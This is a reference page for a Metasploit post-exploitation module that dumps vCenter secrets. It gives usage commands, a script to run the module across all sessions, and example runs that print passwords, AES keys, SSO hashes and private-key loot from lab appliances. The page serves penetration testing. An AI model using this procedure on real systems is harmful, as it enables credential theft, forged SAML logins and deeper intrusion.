VMware vCenter Secrets Dump - Metasploit
This page contains detailed information about how to use the post/linux/gather/vcenter_secrets_dump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: VMware vCenter Secrets Dump
Module: post/linux/gather/vcenter_secrets_dump
Source code: modules/post/linux/gather/vcenter_secrets_dump.rb
Disclosure date: 2022-04-15
Last modification time: 2022-11-01 17:33:14 +0000
Supported architecture(s): -
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Grab secrets and keys from the vCenter server and add them to loot. This module is tested against the vCenter appliance only; it will not work on Windows vCenter instances. It is intended to be run after successfully acquiring root access on a vCenter appliance and is useful for penetrating further into the environment following a vCenter exploit that results in a root shell. Secrets include the dcAccountDN and dcAccountPassword for the vCenter machine which can be used for maniuplating the SSO domain via standard LDAP interface; good for plugging into the vmware_vcenter_vmdir_ldap module or for adding new SSO admin users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with associated private keys are also plundered and can be used to sign forged SAML assertions for the /ui admin interface.
Module Ranking and Traits
Module Ranking:
- manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/linux/gather/vcenter_secrets_dump
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/linux/gather/vcenter_secrets_dump
msf post(vcenter_secrets_dump) > show options
... show and set options ...
msf post(vcenter_secrets_dump) > set SESSION session-id
msf post(vcenter_secrets_dump) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/linux/gather/vcenter_secrets_dump")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on
Knowledge Base
Vulnerable Application
Grab secrets and keys from the vCenter server and add them to loot. Secrets include the dcAccountDN and dcAccountPassword for the vCenter machine which can be used for manipulating the SSO domain via standard LDAP interface; good for plugging into the vmware_vcenter_vmdir_ldap module or for adding new SSO admin users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with associated private keys are also plundered and can be used to sign forged SAML assertions for the /ui admin interface.
Vulnerable Application
This module is tested against the vCenter appliance only; it will not work on Windows vCenter instances. It is intended to be run after successfully acquiring root access on a vCenter appliance and is useful for penetrating further into the environment following a vCenter exploit that results in a root shell. This module has been tested against vCenter appliance versions 7.0 and 6.7 but will probably work against other versions of vCenter appliance.
Verification Steps
This is a post module and requires a meterpreter or shell session on the vCenter appliance with root access.
- Start msfconsole
- Get session on vCenter appliance via exploit of your choice and background it
- Do:
use post/linux/gather/vcenter_secrets_dump
- Do:
set session <session>
- Do:
dump
Advanced Options
DUMP_VMDIR
Boolean value that controls whether the module will attempt to extract vSphere SSO domain information, including SSO user hashes and a complete LDIF dump of the SSO directory. Defaults to true.
DUMP_VMAFD
Boolean value that controls whether the module will attempt to extract vSphere certificates, private keys, and secrets. Defaults to true.
DUMP_SPEC
If DUMP_VMAFD is also true, attempt to extract VM Guest Customization secrets from PSQL using the DATA-ENCIPHERMENT key extracted from VMAFD. Defaults to true.
Scenarios
Example run from meterpreter session on vCenter appliance version 7.0 U3d
msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > dump
[*] vSphere Hostname and IPv4: vcenterdelta.cesium137.io [192.168.100.70]
[*] VMware VirtualCenter 7.0.3 build-19480866
[*] Embedded Platform Service Controller
[*] Gathering vSphere SSO domain information ...
[+] vSphere SSO DC DN: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local
[+] vSphere SSO DC PW: *6{ K3Ei*@<J[.gd5c3o
[*] Extract vmdird tenant AES encryption key ...
[+] vSphere Tenant AES encryption
KEY: K-Z(x7wf35{E"I2v
HEX: 4b2d5a287837776633357b4522493276
[*] Extract vmware-vpx AES key ...
[+] vSphere vmware-vpx AES encryption
HEX: 9927ed2d42b80f9d3eec8e77441c63360c0c7bbed48076ff884efcfd27ef0682
[*] Extracting PostgreSQL database credentials ...
[+] VCDB Name: VCDB
[+] VCDB User: vc
[+] VCDB Pass: 6!24A3W5LekCOPK=
[*] Extract ESXi host vpxuser credentials ...
[+] ESXi Host esxi01d.cesium137.io [192.168.100.101] LOGIN: vpxuser PASS: 3be=IDc}11FC8EJ1^JgBO]Bl7I8}^:]Z
[+] ESXi Host esxi02d.cesium137.io [192.168.100.102] LOGIN: vpxuser PASS: 1gp0o7o[~/Fk^1bqm0K1K\YIl.VsgTK8
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF ...
[+] LDIF Dump: /home/cs137/.msf4/loot/20220504162039_default_192.168.100.70_vmdir_227362.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: CN=workload_storage_management-07afcee6-c2e2-4d0a-aa28-0305ab5825a4,cn=ServicePrincipals,dc=delta,dc=vsphere,dc=local:$dynamic_82$4bb329cd5a078c7b22b2f2bafd65f1c58e523d2d3f85ff75f51763d32c2769893a5fdb35e36e4217f1dcc9e10f1cfdaf495fdcc9ea5bf3fbfd8017bd57614d05$HEX$050a7a45b3ad8ee24a815b41c94b5fc9
[+] vSphere SSO User Credential: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local:$dynamic_82$d857c278b1dfa799e293f0f35551d29b01973c24ef9e2c0e079d09049826ca824757f8377e7646e003272a39ae459a66c5fca54ac76eb67ddc5d1133cb4c4628$HEX$4ae8badb536deab2c3be64d3a1dfeb2e
[+] vSphere SSO User Credential: CN=waiter-0ad33e8d-0ca0-4912-8eb0-0a80a16fda82,cn=users,dc=delta,dc=vsphere,dc=local:$dynamic_82$9a9dd8ec92a332b91b7602d45404a144973c75f54111ecf7cdfa70cea29e358838132f8380361091a40efdf52c5ac34cfd988574e489a83e2c1f1438c764bad0$HEX$2971d8fd5160de2e71a0dfa744af5d6b
[+] vSphere SSO User Credential: cn=krbtgt/DELTA.VSPHERE.LOCAL,cn=users,dc=DELTA,dc=VSPHERE,dc=LOCAL:$dynamic_82$41437d26f1d4c2cdc67cff7ec66f91da643cb4b331fc00fa052ace43e4eae7ef277f9b9b05d5c06c46f5b73bc2132ed772552274464098d2479604161a001d32$HEX$5a21a4b810348c78f9997a3c405f3340
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=DELTA,dc=VSPHERE,dc=LOCAL:$dynamic_82$aa0ef201580566738898162a079c70daa0bb19be0927d6b44ac3d65724df1e14cd6c273c132cd117b98ed8c7b37d2ae861d96e6ff28e97e81f54629072a83e62$HEX$031df0af1964ea1e5c733541f2f89a7d
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=delta,dc=vsphere,dc=local:$dynamic_82$cd4362341bb01e2de096c262c59e3c6f8bedf78ae96f378de57e369d5071f114fba4c43c4d577317ea3d923eafa9b9a6f6154a10d0e81f7fa00fb711b3519a8c$HEX$0155fb261f868fbf8f3feda9139acc50
[+] vSphere SSO User Credential: cn=vmca/[email protected],cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$b478eb780a9f43960541a236b4f258bf9d7726f76d6f9d13f25fc815bac002b191be96a90c87bf607b54e13769878b5863cde7eb12b151db5c5892e9b00e5f48$HEX$a56c39678fd290619f726e31c5d6fce8
[+] vSphere SSO User Credential: cn=ldap/[email protected],cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$efeb6777719ccb7278a6c216e3a307bc0a4a9ecbf240a36a6947161dbd44e143cb8fa9712f2629e7022bb2bcdf3c144b7ecbbc499f15dd3791e920205ec7fcba$HEX$bb3eddcba08bf93c372f23a45c5fb651
[+] vSphere SSO User Credential: cn=DNS/[email protected],cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$059761db3117ce52c864cf5dab7b6320f47d0e09c1ff3afaa0835fe4775aa0669a09ee26412e15bfc8337a9747e73e4ffab1859292e716dba0e92104708332a6$HEX$4629f7e9c587f6d1b57b2f56e96bf05a
[+] vSphere SSO User Credential: cn=host/[email protected],cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$6b11a2b58752e8409f57bc72b45e6599209714000b8a17e95d661663d54d691ce013be2700fa6c8e30e6d98259d1810c5f883fcc8099bd16342e6a4c0d179895$HEX$2a14a8f480ca071f6edffd3720732d5d
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://vcenterdelta.cesium137.io:389:
[+] SSOUSER: [email protected]
[+] SSOPASS: *6{ K3Ei*@<J[.gd5c3o
[+] SSODOMAIN: delta.vsphere.local
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_LDAP_WITH_AD_MAPPING @ ldap://cesium137.io:
[+] SSOUSER: CESIUM137\ldap
[+] SSOPASS: ThisIsSecret!
[+] SSODOMAIN: cesium137.io
[*] Extracting certificates from vSphere platform ...
[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220504162042_default_192.168.100.70_vmca_603049.key
[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220504162042_default_192.168.100.70_vmca_882434.pem
[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220504162044_default_192.168.100.70_idp_836918.key
[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220504162044_default_192.168.100.70_idp_500987.pem
[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220504162046_default_192.168.100.70___MACHINE_CERT_032048.key
[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220504162047_default_192.168.100.70___MACHINE_CERT_559717.pem
[+] MACHINE key: /home/cs137/.msf4/loot/20220504162050_default_192.168.100.70_machine_503081.key
[+] MACHINE cert: /home/cs137/.msf4/loot/20220504162051_default_192.168.100.70_machine_646697.pem
[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220504162052_default_192.168.100.70_vspherewebclien_812043.key
[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220504162053_default_192.168.100.70_vspherewebclien_959067.pem
[+] VPXD key: /home/cs137/.msf4/loot/20220504162055_default_192.168.100.70_vpxd_194878.key
[+] VPXD cert: /home/cs137/.msf4/loot/20220504162056_default_192.168.100.70_vpxd_153814.pem
[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220504162057_default_192.168.100.70_vpxdextension_878062.key
[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220504162058_default_192.168.100.70_vpxdextension_623838.pem
[+] HVC key: /home/cs137/.msf4/loot/20220504162100_default_192.168.100.70_hvc_452066.key
[+] HVC cert: /home/cs137/.msf4/loot/20220504162100_default_192.168.100.70_hvc_307290.pem
[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220504162102_default_192.168.100.70_dataenciphermen_478118.key
[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220504162103_default_192.168.100.70_dataenciphermen_345609.pem
[+] SMS key: /home/cs137/.msf4/loot/20220504162105_default_192.168.100.70_sms_self_signed_858005.key
[+] SMS cert: /home/cs137/.msf4/loot/20220504162106_default_192.168.100.70_sms_self_signed_095121.pem
[+] WCP key: /home/cs137/.msf4/loot/20220504162108_default_192.168.100.70_wcp_982089.key
[+] WCP cert: /home/cs137/.msf4/loot/20220504162108_default_192.168.100.70_wcp_984591.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[*] Processing vpx_customization_spec 'Good Win10 Template with Local and Domain Join' ...
[*] Validating data encipherment key ...
[*] Initial administrator account password found for vpx_customization_spec 'Good Win10 Template with Local and Domain Join':
[+] Initial Admin PW: SamIAm!
[*] AD domain join account found for vpx_customization_spec 'Good Win10 Template with Local and Domain Join':
[+] AD User: [email protected]
[+] AD Pass: IAmSam!
[*] Processing vpx_customization_spec 'Borked Win10 Template' ...
[*] Validating data encipherment key ...
[!] Could not associate encryption public key with any of the private keys extracted from vCenter, skipping
[*] Processing vpx_customization_spec 'Good Win10 Template with Local' ...
[*] Validating data encipherment key ...
[*] Initial administrator account password found for vpx_customization_spec 'Good Win10 Template with Local':
[+] Initial Admin PW: SamIAm!
[*] Post module execution completed
msf6 post(linux/gather/vcenter_secrets_dump) >
Example run from meterpreter session on vCenter appliance version 6.0 U3j
msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > dump
[*] vSphere Hostname and IPv4: vcenteralpha.cesium137.io [192.168.100.60]
[*] VMware VirtualCenter 6.0.0 build-14510547
[*] Embedded Platform Service Controller
[*] Gathering vSphere SSO domain information ...
[+] vSphere SSO DC DN: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
[+] vSphere SSO DC PW: <PMW{T:4mnb@UBs/$f(w
[*] Extract vmdird tenant AES encryption key ...
[+] vSphere Tenant AES encryption
KEY: (>d%>D3'i@rAj}!"
HEX: 283e64253e443327694072416a7d2122
[*] Extract vmware-vpx AES key ...
[+] vSphere vmware-vpx AES encryption
HEX: acdeb90515681eb8c357e3a94312106934f174324c39d1deb012337effc124de
[*] Extracting PostgreSQL database credentials ...
[+] VCDB Name: VCDB
[+] VCDB User: vc
[+] VCDB Pass: 4yFcqZ2$m^&H<K?z
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF ...
[+] LDIF Dump: /home/cs137/.msf4/loot/20220504162417_default_192.168.100.60_vmdir_757761.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local:$dynamic_82$95fe2a1c250329ff99f3ebf364a58f1ee4263560c30c8010c9774b4f5bf151ef3df4b378ab88a2e3629f714ed1b0060f3ae10b7bd7533d025f47d33542bf8ade$HEX$28d03ba88a83c83ae1d999b77259670c
[+] vSphere SSO User Credential: CN=waiter 514f2778-d8c0-49aa-a10b-1951699cc8c6,cn=users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$495c53a6dd4b813638608feb0b4a1b27045d41e36e798c68ebdb312edc2f16c77d780c2b4fc6bed438cfd0ef743f1c1e0363692bd2c195371c2d4dd0b9862f39$HEX$b74fe42af9579d6c5536a50872c9eedf
[+] vSphere SSO User Credential: cn=krbtgt/ALPHA.VSPHERE.LOCAL,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$1c01a034aadd563bea5be04b9e74dbc5bb9ac37694f58bda6eea0e83df97bc64e5fdf932991a9bcaaf82da6300542e8d8d51c16282e9aaa08da2c6c65a8b7cdc$HEX$2434b5c538e31bb3854bcd277a5f63ab
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$525d688d4614db9939ffdba8e41e76bc3bd473b0cc4fdeac0994042d3a5a7adc9c8e46040c846d6c7f449f7f94f9d3370cc554ab668dcd3d1006ca38a60fb70d$HEX$fd6001dd5be548498d94bf08641d657d
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$3a4fc4fbacbc6d10e4787383841ebc38fc20ebbb7780692ee0c5fa4b1a2bd675b7c41e8604f4a0eba9546993b971790115279281a108e6e21f4b83740fae449f$HEX$db1d08918cc2eb7bb372545b449643ca
[+] vSphere SSO User Credential: cn=vmca/[email protected],cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$6d7a381d442a674bcc730604160c6963adc937a45a14b9d8e750b55fd3500e54c1bd739968a611a63f747db0ebbe8d31f0d96e5b84a2d72c3c79f922e922adc7$HEX$68fbf3edaba87c972f2423d670377cd7
[+] vSphere SSO User Credential: cn=ldap/[email protected],cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$f584f632b79113f1a5f31d0d8e1df094438fd1644140fd3692a880e4c3ddb8a25969a71ec0e10b31c61aa256217cc0e4c014a21350645b2a3fb7327d0ee5f96a$HEX$9cfee2bcd297134f1d5a921c20f373e8
[+] vSphere SSO User Credential: cn=host/[email protected],cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ac83726dabc4a021b7737b1e696eba9067e73fc8058e719733b2f4ebded115ae653dd75f13ec26b6a641986c772b20bf37be999c9978d220e94f1d0eeab9d3b8$HEX$91dae8ef6feae8880dd9708664040598
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] SSOUSER: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,DC=alpha,DC=vsphere,DC=local
[+] SSOPASS: <PMW{T:4mnb@UBs/$f(w
[+] SSODOMAIN: alpha.vsphere.local
[*] Extracting certificates from vSphere platform ...
[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220504162419_default_192.168.100.60_vmca_525753.key
[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220504162419_default_192.168.100.60_vmca_840227.pem
[!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files ...
[-] Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM
[!] Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work
[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220504162421_default_192.168.100.60_idp_482598.key
[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220504162421_default_192.168.100.60_idp_805228.pem
[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220504162424_default_192.168.100.60___MACHINE_CERT_193219.key
[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220504162424_default_192.168.100.60___MACHINE_CERT_071831.pem
[+] MACHINE key: /home/cs137/.msf4/loot/20220504162428_default_192.168.100.60_machine_480281.key
[+] MACHINE cert: /home/cs137/.msf4/loot/20220504162428_default_192.168.100.60_machine_368258.pem
[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220504162430_default_192.168.100.60_vspherewebclien_464390.key
[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220504162431_default_192.168.100.60_vspherewebclien_445076.pem
[+] VPXD key: /home/cs137/.msf4/loot/20220504162432_default_192.168.100.60_vpxd_397207.key
[+] VPXD cert: /home/cs137/.msf4/loot/20220504162433_default_192.168.100.60_vpxd_425995.pem
[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220504162435_default_192.168.100.60_vpxdextension_185899.key
[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220504162436_default_192.168.100.60_vpxdextension_485039.pem
[+] SMS key: /home/cs137/.msf4/loot/20220504162437_default_192.168.100.60_sms_self_signed_823426.key
[+] SMS cert: /home/cs137/.msf4/loot/20220504162438_default_192.168.100.60_sms_self_signed_711433.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed
msf6 post(linux/gather/vcenter_secrets_dump) >
Example run from meterpreter session on vCenter appliance version 6.5 U3q, configured with an external PSC
msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > dump
[*] vSphere Hostname and IPv4: vctr01.cesium137.io [192.168.0.111]
[*] VMware VirtualCenter 6.5.0 build-18499837
[!] External Platform Service Controller: psc01.cesium137.io
[!] This module assumes embedded PSC, functionality will be limited
[*] Gathering vSphere SSO domain information ...
[+] vSphere SSO DC DN: cn=vctr01.cesium137.io,ou=Computers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: *Pz[aO0Udli"%mbt%`Gn
[*] Extract vmware-vpx AES key ...
[+] vSphere vmware-vpx AES encryption
HEX: db5beca47d9bb7af5da5278aeeee4b0a83076670736c46546f77a1ddfbe54f2e
[*] Extracting PostgreSQL database credentials ...
[+] VCDB Name: VCDB
[+] VCDB User: vc
[+] VCDB Pass: cq1=+*f(gTQZ_6)Y
[*] Extract ESXi host vpxuser credentials ...
[+] ESXi Host esxi01.cesium137.io [192.168.0.101] LOGIN: vpxuser PASS: 13M\.3LCb36n8:=_847HzS}U:c9@d65=
[+] ESXi Host esxi02.cesium137.io [192.168.0.102] LOGIN: vpxuser PASS: -0fQviFI0f}C@8:v3y[jP[\C{lqU8.kL
[+] ESXi Host esxi03.cesium137.io [192.168.0.103] LOGIN: vpxuser PASS: .TB4/OEr3H^pM.kj4a^-]0Z:_TWl{=_H
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF ...
[+] LDIF Dump: /home/cs137/.msf4/loot/20220505083154_default_192.168.0.111_vmdir_383063.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[!] No password hashes found
[*] Processing SSO identity sources ...
[!] No SSO ID provider information found
[*] Extracting certificates from vSphere platform ...
[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220505083156_default_192.168.0.111___MACHINE_CERT_323341.key
[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220505083156_default_192.168.0.111___MACHINE_CERT_255826.pem
[+] MACHINE key: /home/cs137/.msf4/loot/20220505083158_default_192.168.0.111_machine_248465.key
[+] MACHINE cert: /home/cs137/.msf4/loot/20220505083159_default_192.168.0.111_machine_130920.pem
[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220505083200_default_192.168.0.111_vspherewebclien_019114.key
[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220505083201_default_192.168.0.111_vspherewebclien_777853.pem
[+] VPXD key: /home/cs137/.msf4/loot/20220505083202_default_192.168.0.111_vpxd_846784.key
[+] VPXD cert: /home/cs137/.msf4/loot/20220505083202_default_192.168.0.111_vpxd_796349.pem
[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220505083204_default_192.168.0.111_vpxdextension_570408.key
[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220505083204_default_192.168.0.111_vpxdextension_490761.pem
[+] SMS key: /home/cs137/.msf4/loot/20220505083206_default_192.168.0.111_sms_self_signed_278681.key
[+] SMS cert: /home/cs137/.msf4/loot/20220505083206_default_192.168.0.111_sms_self_signed_163386.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[*] Processing vpx_customization_spec 'Windows 2019 Datacenter' ...
[*] Validating data encipherment key ...
[*] Initial administrator account password found for vpx_customization_spec 'Windows 2019 Datacenter':
[+] Initial Admin PW: IAmSam!
[*] AD domain join account found for vpx_customization_spec 'Windows 2019 Datacenter':
[+] AD User: [email protected]
[+] AD Pass: Gr33n3gg$!
[*] Post module execution completed
Go back to menu.
Msfconsole Usage
Here is how the linux/gather/vcenter_secrets_dump post exploitation module looks in the msfconsole:
msf6 > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > show info
Name: VMware vCenter Secrets Dump
Module: post/linux/gather/vcenter_secrets_dump
Platform: Linux, Unix
Arch:
Rank: Manual
Disclosed: 2022-04-15
Provided by:
npm <[email protected]>
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Compatible session types:
Meterpreter
Shell
Available actions:
Name Description
---- -----------
Dump Dump vCenter Secrets
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Description:
Grab secrets and keys from the vCenter server and add them to loot.
This module is tested against the vCenter appliance only; it will
not work on Windows vCenter instances. It is intended to be run
after successfully acquiring root access on a vCenter appliance and
is useful for penetrating further into the environment following a
vCenter exploit that results in a root shell. Secrets include the
dcAccountDN and dcAccountPassword for the vCenter machine which can
be used for maniuplating the SSO domain via standard LDAP interface;
good for plugging into the vmware_vcenter_vmdir_ldap module or for
adding new SSO admin users. The MACHINE_SSL, VMCA_ROOT and SSO IdP
certificates with associated private keys are also plundered and can
be used to sign forged SAML assertions for the /ui admin interface.
Module Options
This is a complete list of options available in the linux/gather/vcenter_secrets_dump post exploitation module:
msf6 post(linux/gather/vcenter_secrets_dump) > show options
Module options (post/linux/gather/vcenter_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Post action:
Name Description
---- -----------
Dump Dump vCenter Secrets
Advanced Options
Here is a complete list of advanced options supported by the linux/gather/vcenter_secrets_dump post exploitation module:
msf6 post(linux/gather/vcenter_secrets_dump) > show advanced
Module advanced options (post/linux/gather/vcenter_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_LIC false yes If DUMP_VMDIR is enabled, attempt to extract vSphere license keys
DUMP_SPEC true yes If DUMP_VMAFD is enabled, attempt to extract VM Guest Customization secrets from PSQL
DUMP_VMAFD true yes Extract vSphere certificates, private keys, and secrets
DUMP_VMDIR true yes Extract SSO domain information
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the linux/gather/vcenter_secrets_dump module can do:
msf6 post(linux/gather/vcenter_secrets_dump) > show actions
Post actions:
Name Description
---- -----------
Dump Dump vCenter Secrets
Evasion Options
Here is the full list of possible evasion options supported by the linux/gather/vcenter_secrets_dump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(linux/gather/vcenter_secrets_dump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Invalid vSphere PSC Machine UUID returned from vmafd-cli
- Could not determine vSphere SSO domain name via lwregshell
- Could not determine vmdir dcAccountDN from lwregshell
- Could not determine vmdir dcAccountPassword from lwregshell
- Error processing LDIF file
- Empty vecs-cli store list returned from vCenter
- Could not extract <STORE_LABEL> private key
- Could not extract <STORE_LABEL> certificate
- Could not locate VMCA_ROOT keypair
- Could not extract VMCA_ROOT private key
- Could not extract VMCA_ROOT certificate
- VMCA_ROOT certificate and private key mismatch
- No password hashes found
- Type <TYPE> hash length is not 128 digits (<DN>)
- Type <TYPE> salt length is not 32 digits (<DN>)
- Hash type <TYPE.INSPECT> is not supported yet (<DN>)
- No SSO ID provider information found
- Error extracting tenant and vpx AES encryption key
- Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got <AES_KEY_LEN>
- Error performing tenant_aes_decrypt
- Error performing tenant_aes_decrypt
- Error updating module keystore
- Error updating module keystore
- Error processing IdP trusted certificate private key
- Error processing IdP trusted certificate chain
- Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work
- Unable to associate IdP certificate and private key
- No vSphere Licenses Found
- No vpx_customization_spec entries evident
- Could not determine DER byte length for vpx_customization_spec '<SPEC>'
- Invalid encryption certificate for vpx_customization_spec '<SPEC>'
- Could not associate encryption public key with any of the private keys extracted from vCenter, skipping
- Could not access private key for VM Guest Customization Template '<SPEC>', cannot decrypt
- vCenter private key does not associate with public key for VM Guest Customization Template '<SPEC>', cannot decrypt
- Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'
- Malformed XML received from vCenter for VM Guest Customization Template '<SPEC>'
- No ESXi hosts attached to this vCenter system
- Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM
- Invalid x509 certificate extracted from IDM!
- Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter
- No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/
- Could not find <V>
- This module only supports embedded PostgreSQL, appliance reports DB type '<VC_DB_TYPE>'
- Could not find <PSQL_BIN>
- Could not determine vCenter DNS FQDN
- Could not determine vCenter IPv4 address
- Could not find /etc/vmware/deployment.node.type
- Unable to determine appliance deployment type returned from server: <VCSA_TYPE>
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Invalid vSphere PSC Machine UUID returned from vmafd-cli
Here is a relevant code snippet related to the "Invalid vSphere PSC Machine UUID returned from vmafd-cli" error message:
124:
125: vsphere_machine_id = get_machine_id
126: if is_uuid?(vsphere_machine_id)
127: vprint_status("vSphere Machine ID: #{vsphere_machine_id}")
128: else
129: print_bad('Invalid vSphere PSC Machine UUID returned from vmafd-cli')
130: end
131:
132: vsphere_domain_name = get_domain_name
133: unless is_fqdn?(vsphere_domain_name)
134: fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vSphere SSO domain name via lwregshell')
Could not determine vSphere SSO domain name via lwregshell
Here is a relevant code snippet related to the "Could not determine vSphere SSO domain name via lwregshell" error message:
129: print_bad('Invalid vSphere PSC Machine UUID returned from vmafd-cli')
130: end
131:
132: vsphere_domain_name = get_domain_name
